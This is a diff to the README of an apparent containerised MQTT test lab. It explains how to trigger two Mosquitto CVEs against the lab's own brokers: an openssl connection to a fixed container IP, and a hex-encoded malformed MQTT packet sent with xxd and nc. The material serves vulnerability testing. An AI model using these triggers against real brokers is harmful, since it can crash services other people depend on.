Iffnar/MQTT-in-Containers/README.md

 Note: The password for any certificate file is "test"

-CVE-2023-5632
+CVE-2023-5632 <br>
 This CVE works with the encrypted Broker.
 To trigger the exploit all you need is the following command.
-The ip adress is static and should work unless you changed it: openssl s_client -connect 172.23.0.2:8883
+The ip adress is static and should work unless you changed it:<br>
+openssl s_client -connect 172.23.0.2:8883<br>
 It might be beneficial to limit the number of cpu cores of your testing enviroment.
-For WSL this can be done in the WSL settings.
+For WSL this can be done in the WSL settings.<br>
-CVE-2021-34432
+CVE-2021-34432<br>
 This command only works with the unencrypted broker and if allow_anonymous is set to true in the mosquitto.conf file.
-But could also be replicated for the encrypted broker if you are able to sucessfully authenticate a package with topic length 0. echo 102b00044d5154540500003c0822000a110000000f00166d7174746f6f6c732d383739363736313532303132393d0900000621000a220005e000 | xxd -p -r | nc localhost 1883
+But could also be replicated for the encrypted broker if you are able to sucessfully authenticate a package with topic length 0.<br>
+echo 102b00044d5154540500003c0822000a110000000f00166d7174746f6f6c732d383739363736313532303132393d0900000621000a220005e000 | xxd -p -r | nc localhost 1883